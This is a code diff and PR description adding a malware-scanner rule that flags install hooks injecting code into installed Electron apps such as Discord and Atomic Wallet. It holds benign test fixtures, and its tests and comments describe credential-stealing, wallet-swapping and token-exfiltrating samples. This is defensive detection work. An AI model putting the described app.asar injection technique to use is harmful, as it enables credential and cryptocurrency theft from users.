+// project's OWN dist/ output — no os.homedir(), no existsSync probe of a foreign install. The
+// target is not home-rooted, so neither the CRITICAL nor the HIGH tier fires.
+const fs = require('fs');
+const path = require('path');
+
+function pack(asarBuffer) {
+  const outDir = path.join(__dirname, 'dist', 'win-unpacked', 'resources');
+  fs.mkdirSync(outDir, { recursive: true });
+  fs.writeFileSync(path.join(outDir, 'app.asar'), asarBuffer);
+}
+
+pack(Buffer.from([0x00, 0x00, 0x00, 0x00]));

--- a/tests/samples/electron-injection/own-app-config/main.js
+++ b/tests/samples/electron-injection/own-app-config/main.js
@@ -1,0 +1,31 @@
+// NEGATIVE: a legitimate Electron app. It opens its OWN window and persists its OWN settings as
+// JSON under the user's home. It has every corroboration signal the injector has — os.homedir(),
+// an app.asar reference, fs.existsSync, BrowserWindow — yet must NOT fire, because the WRITE
+// content is JSON config, not injected code. This is the discriminator the AST coupling enforces.
+const { app, BrowserWindow } = require('electron');
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+
+function createWindow() {
+  const win = new BrowserWindow({ width: 900, height: 640 });
+  win.loadFile(path.join(__dirname, 'index.html'));
+  return win;
+}
+
+function saveSettings(settings) {
+  const dir = path.join(os.homedir(), '.config', 'my-notes-app');
+  if (!fs.existsSync(dir)) {
+    fs.mkdirSync(dir, { recursive: true });
+  }
+  fs.writeFileSync(path.join(dir, 'settings.json'), JSON.stringify(settings, null, 2));
+}
+
+app.whenReady().then(() => {
+  const bundled = path.join(process.resourcesPath, 'app.asar');
+  if (fs.existsSync(bundled)) {
+    // running from the packaged app.asar
+  }
+  createWindow();
+  saveSettings({ theme: 'dark', launchAtLogin: false });
+});

--- a/tests/samples/electron-injection/scaffolder/scaffold.js
+++ b/tests/samples/electron-injection/scaffolder/scaffold.js
@@ -1,0 +1,21 @@
+// NEGATIVE: a project scaffolder. The CONTENT it writes IS Electron code (require('electron') +
+// BrowserWindow), so the payload-in-write signal is present — but it targets a fresh project
+// directory, not a foreign installed app: no Electron .asar/core signature path and no home root.
+// Foreign-app discovery therefore fails, so the CRITICAL tier must NOT fire. This is the guard
+// against flagging legitimate electron template generators.
+const fs = require('fs');
+const path = require('path');
+
+const mainTemplate = [
+  "const { app, BrowserWindow } = require('electron');",
+  "app.whenReady().then(() => {",
+  "  const win = new BrowserWindow({ width: 1024, height: 768 });",
+  "  win.loadFile('index.html');",
+  "});",
+].join('\n');
+
+const projectDir = path.join(process.cwd(), 'my-electron-app', 'src');
+if (!fs.existsSync(projectDir)) {
+  fs.mkdirSync(projectDir, { recursive: true });
+}
+fs.writeFileSync(path.join(projectDir, 'main.js'), mainTemplate);

--- a/tests/scanner/electron-injection.test.js
+++ b/tests/scanner/electron-injection.test.js
@@ -1,0 +1,82 @@
+'use strict';
+
+/**
+ * MUADDIB-AST-097 electron_app_injection — behavioral tests.
+ *
+ * Positive: the two real ground-truth injectors — Discord debugger-hook credential stealer
+ * (GT-036) and Atomic Wallet .asar prototype-hook address-swap (GT-044) — must score CRITICAL.
+ * HIGH tier: a bare overwrite of a home-rooted app.asar with an unresolved payload.
+ * Negative (the discriminators): a legit Electron app writing its OWN JSON config (every
+ * corroboration signal present, but the write content is config, not code); an electron-builder
+ * packing app.asar into dist/; a scaffolder writing an Electron template into a project (payload
+ * present but no foreign-app discovery); and electron-native-notify (a home-probing wallet/
+ * credential stealer that never writes into an app's .asar — caught by other rules, not this one).
+ */
+
+const path = require('path');
+const { asyncTest, assert, runScanDirect } = require('../test-utils');
+
+const GT = path.join(__dirname, '..', 'ground-truth', 'samples');
+const FIX = path.join(__dirname, '..', 'samples', 'electron-injection');
+const eaiOf = r => (r.threats || []).filter(t => t.type === 'electron_app_injection');
+const sevs = list => list.map(t => t.severity);
+
+async function runElectronInjectionTests() {
+  console.log('\n=== ELECTRON APP INJECTION TESTS (MUADDIB-AST-097) ===\n');
+
+  // ── Positives (real ground-truth malware) ──
+  await asyncTest('AST-097: Discord core injection (GT-036) → electron_app_injection CRITICAL', async () => {
+    const e = eaiOf(await runScanDirect(path.join(GT, 'discord-electron-inject')));
+    assert(sevs(e).includes('CRITICAL'), `expected CRITICAL electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  await asyncTest('AST-097: Discord core injection (GT-036) scores >= 20 (alert threshold)', async () => {
+    const r = await runScanDirect(path.join(GT, 'discord-electron-inject'));
+    assert(r.summary.riskScore >= 20, `expected riskScore >= 20, got ${r.summary.riskScore}`);
+  });
+
+  await asyncTest('AST-097: Atomic Wallet .asar patch (GT-044) → electron_app_injection CRITICAL', async () => {
+    const e = eaiOf(await runScanDirect(path.join(GT, 'atomic-wallet-patch')));
+    assert(sevs(e).includes('CRITICAL'), `expected CRITICAL electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  await asyncTest('AST-097: Atomic Wallet .asar patch (GT-044) scores >= 20 (alert threshold)', async () => {
+    const r = await runScanDirect(path.join(GT, 'atomic-wallet-patch'));
+    assert(r.summary.riskScore >= 20, `expected riskScore >= 20, got ${r.summary.riskScore}`);
+  });
+
+  // ── HIGH tier: bare overwrite of a home-rooted app.asar, payload not statically resolvable ──
+  await asyncTest('AST-097: bare home-rooted app.asar overwrite → HIGH (not CRITICAL)', async () => {
+    const e = eaiOf(await runScanDirect(path.join(FIX, 'asar-literal-write')));
+    assert(sevs(e).includes('HIGH') && !sevs(e).includes('CRITICAL'),
+      `expected HIGH-only electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  // ── Negatives (the discriminators the AST coupling enforces) ──
+  await asyncTest('AST-097 (neg): legit Electron app writing its OWN JSON config → no fire', async () => {
+    const e = eaiOf(await runScanDirect(path.join(FIX, 'own-app-config')));
+    assert(e.length === 0, `expected no electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  await asyncTest('AST-097 (neg): electron-builder packing app.asar into dist/ → no fire', async () => {
+    const e = eaiOf(await runScanDirect(path.join(FIX, 'electron-builder-pack')));
+    assert(e.length === 0, `expected no electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  await asyncTest('AST-097 (neg): scaffolder writing an Electron template to a project → no CRITICAL', async () => {
+    const e = eaiOf(await runScanDirect(path.join(FIX, 'scaffolder')));
+    assert(!sevs(e).includes('CRITICAL'), `expected no CRITICAL electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+  });
+
+  await asyncTest('AST-097 (neg): electron-native-notify wallet stealer (home+probe, no .asar write) → no electron_app_injection', async () => {
+    // This sample harvests wallet files + npm tokens and exfiltrates them; it must still be caught
+    // (by credential/exfil rules) but must NOT be attributed to electron_app_injection — it never
+    // overwrites an app's code. Guards against the rule over-claiming any home-probing installer.
+    const r = await runScanDirect(path.join(GT, 'electron-native-notify'));
+    const e = eaiOf(r);
+    assert(e.length === 0, `expected no electron_app_injection, got ${JSON.stringify(sevs(e))}`);
+    assert(r.summary.riskScore >= 20, `sample should still alert via other rules, got ${r.summary.riskScore}`);
+  });
+}
+
+module.exports = { runElectronInjectionTests };


### PR DESCRIPTION
New AST call-level rule: an install hook that locates a third-party Electron app (Discord/Atomic Wallet) via os.homedir()+.asar/electron-core+existsSync and overwrites its code with an injected JS payload. Discriminator: the written CONTENT is injected Electron code, vs a legit app writing JSON config. Catches GT-036 (Discord credential interception) and GT-044 (Atomic Wallet crypto-swap -- a pure miss on master). 0 FP on 183 archive candidates + 37 installers, 9 new tests, full suite failure-set identical to master (0 regression).